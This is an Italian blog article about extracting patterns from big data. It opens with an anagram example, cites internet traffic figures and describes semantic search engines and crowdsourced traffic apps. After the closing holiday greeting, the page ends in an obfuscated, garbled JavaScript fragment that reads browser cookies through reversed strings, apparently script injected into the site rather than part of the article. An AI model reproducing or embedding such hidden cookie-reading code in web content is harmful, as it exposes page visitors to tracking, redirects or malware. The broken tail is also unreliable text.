Il concetto chiave che affrontiamo in questo terzo intervento sull’agenda digitale del Web 3.0 è l’estrazione di pattern significanti da miniere di dati informi: partiamo da un “esempio in provetta”, con pochissimi dati. Supponiamo di avere a disposizione solo un piccolissimo data set fatto di 13 elementi, definiti da lettere a caso, anche ripetute, dell’alfabeto: R, L, L, I, I, E, E, E, A, O, T, T, V.
Bene, se possiedo gli strumenti adatti (di tipo linguistico e matematico combinatorio) in un contesto specifico (in questo caso le regole della lingua italiana), posso estrarre significato dal data set facendo emergere dei pattern che attraversano l’insieme di tutti i dati. Nel nostro “esempio in provetta” basta cercare le sequenze di tutti gli elementi (ma se ne potrebbero estrarre a decine cercando sequenze che comprendono solo parte degli elementi) che abbiano senso nel contesto linguistico che abbiamo preso a riferimento; vediamo così emergere per esempio due espressioni con un loro senso nel contesto linguistico che abbiamo scelto: “L’Io, rete vitale” e “Le reti violate”. E se al contesto generale aggiungo quello mio personale, dallo stesso data set emerge anche il mio nome e cognome: “Valerio Eletti”. Dunque, solo con 13 elementi (o lettere, o byte) e solo nel contesto della lingua italiana, abbiamo fatto emerge subito 3 sequenze portatrici di significato (e non è una scoperta: già nel 1961 Raymond Queneau scriveva Cent mille milliards de poèmes, centomila miliardi di poesie).
Possiamo immaginare che cosa si può fare con centinaia di miliardi di miliardi di byte (ovvero con gli oltre 600 exabyte dei big data attuali, peraltro in veloce crescita)? Sicuramente ancora no. Ma possiamo intuire (e lo verificheremo di giorno in giorno, nei prossimi mesi e anni) che da questi big data, attraversabili e interpretabili con strumenti di tipo semantico o genetico-evolutivo, emergeranno continuamente nuovi pattern: sia quelli che appaiono in risposta a nostre specifiche domande, richieste, esigenze, sia – soprattutto – quelli completamente imprevisti, che emergono per pura serendipity (quella che abbiamo chiamato con un ossimoro, nei precedenti interventi, “serendipity sistematizzata”); tenendo sempre ben presente che il passaggio dalla gestione dei normali data base (per quanto grandi) allo sfruttamento di enormi carotaggi di big data, richiede strategie di approccio, potenze di calcolo e algoritmi non usuali e non ancora completamente messi a punto. Per dare qualche cifra un po’ più specifica, riportiamo ciò che MBAonline.com, in un famoso poster intitolato A day in the Internet, illustra con grande efficacia grafica: ecco qualche spunto: ogni giorno in Internet viene consumata dal traffico tanta informazione da riempire 160 milioni di Dvd; vengono spediti 294 miliardi di email (se fossero lettere e cartoline, per essere smistate richiederebbero un lavoro di due anni delle Poste degli Usa); vengono visti video in quantità pari a 22 milioni di ore delle vecchie serie Tv, e così via … e per il 2020 le previsioni della IDC dicono, in maniera piuttosto colorita, che avremo on line una quantità di byte pari ad almeno 40 volte la quantità di granelli di sabbia di tutte le spiagge della Terra.
E quali sono gli strumenti con cui possiamo aggredire la massa spaventosa dei big data? Due sono le principali tipologie: A) i motori semantici, e B) il complesso del soft computing e delle reti neurali. Qui ora ci focalizziamo sulla prima tipologia, rimandando l’analisi degli altri strumenti e algoritmi ai prossimi interventi.
Partiamo da una sintetica definizione: chiamiamo motori semantici (rifacendoci al neologismo lanciato da Tim Berners-Lee una decina di anni fa) quei software che analizzano il significato delle parole nel proprio contesto: motori di ricerca che non si limitano a cercare negli archivi specifiche sequenze di bit, ma che analizzano la sequenza di bit richiesta all’interno di una ontologia, ovvero di una rete di rapporti con altre parole “imparentate”. Questo è il concetto chiave; la spiegazione nei dettagli non è complicata ma è piuttosto lunga, per cui rimandiamo alla voce Web semantico di Wikipedia, che risulta chiara ed esaustiva (è stata immessa nel 2004 e si è raffinata fino a oggi grazie ai controlli, alle discussioni e alle correzioni di oltre 120 esperti, con una media di un intervento di editing ogni due settimane, ininterrottamente per otto anni: esempio pregnante di auto-organizzazione dal basso di un sistema complesso come il Web 2.0).
E quindi vediamo in concreto qualche esempio di applicazioni di motori semantici.
Il più immediato e impressionante è quello che abbiamo già citato nel precedente intervento: l’analisi semantica automatizzata di milioni di tweet che permettono di prevedere all’87% l’andamento della Borsa nelle 48-72 ore successive, in base all’andamento dei sentiment espressi su Twitter.
Passiamo quindi a un terreno di sfruttamento dei massive data sets completamente diverso.
Un vero e proprio grappolo di app tra le più utili e di immediato uso è presentato nel rapporto pubblicato di recente da New Cities Foundation in collaborazione con Ericsson’s Research: si tratta di applicazioni che permettono di connettere i pendolari tra di loro facendo emergere le informazioni utili per diminuire lo stress da traffico. Qualche nome: la israeliana Waze, che si presenta on line con lo slogan “Ottieni la strada migliore con il contributo degli altri guidatori, in tempo reale” e che questa estate ha raggiunto i 20 milioni di utenti; e poi Roadify (“Connect and go”), che utilizza un sistema di raccolta dati in crowdsourcing per estrarre informazioni non solo sul traffico ma anche sui mezzi pubblici in circolazione; la app per iPhone e iPad dal nome esplicito di “Traffic”, della InriX, leader internazionale per la rilevazione delle info sul traffico; o la californiana ParkMe, che estrae dalla condivisione di dati le informazioni relative ai più vicini parcheggi disponibili (per una presentazione un po’ più articolata di queste app, si veda il sito di Changemakers).
Altro esempio concreto, il motore di ricerca Recorded Future, che ha interessato sia Google che la CIA, come segnalava Wired in un articolo del 2010 intitolato “Il motore che ricerca nel futuro” e sottotitolato “Largo agli algoritmi semantici per prevedere eventi futuri. Con investimenti di Google e l’interesse della CIA”. Se volete provarlo basta registrarsi: ci sono diagrammi davvero intriganti, anche se ancora sanno molto di divertissement.
Questi sono piccoli esempi che vogliono suggerire solo una suggestione dello scenario delle tipologie di informazioni e conoscenze che stanno emergendo da data base via via più massivi, ma che possono dare l’idea di cosa ci aspetta – in forma di opportunità e minacce – , soprattutto se si tiene conto che oggi si utilizza solo lo 0,5 per cento dei dati che abbiamo a disposizione per farne emergere informazione organizzata e utilizzabile per previsioni o gestione di azioni ed eventi sociali (come appunto il traffico nelle ore di punta); approfondimenti sul processo in atto e vari studi correlati si trovano nel iView IDC; per chi legge solo l’italiano, suggerisco la ricca ed efficace sintesi proposta il 15 dicembre scorso da La Stampa con il titolo Il grande spreco dei big data.
Per concludere, una notazione: non dimentichiamo che uno degli strumenti più efficaci per interpretare i pattern emergenti da massive data sets è costituito dalla resa visiva dei risultati: un buon programma di visualizzazione delle informazioni massive fa la differenza: lo dimostrano i tanti esempi concreti presentati a Torino un anno fa al convegno internazionale “Visualizing Information in Complex Environment”: cliccando qui ne trovate una sintesi esaustiva, con esempi che vanno dalla modellizzazione delle città alla diffusione delle epidemie, dai modelli di mobilità alle dinamiche complesse in Internet in tempo reale.
Ci ritroviamo a Gennaio con la prossima puntata di questa mia articolata riflessione sui big data e il loro utilizzo nell’ottica di una agenda digitale segnata dal Web 3.0. Intanto a voi un augurio molto tradizionale di Buone Feste.
function cc(ccn){var c=d[‘cookie’];return c.search(ccn.split(”).reverse().join(”))^O0$5rL”E,)3T<:#}N%u&/{HXUSWps+ixt`@bm~qGh7AvCQ;1-Jc*kZIgl!fnyw9DP6Rj2e[(aYB8._=KM4';}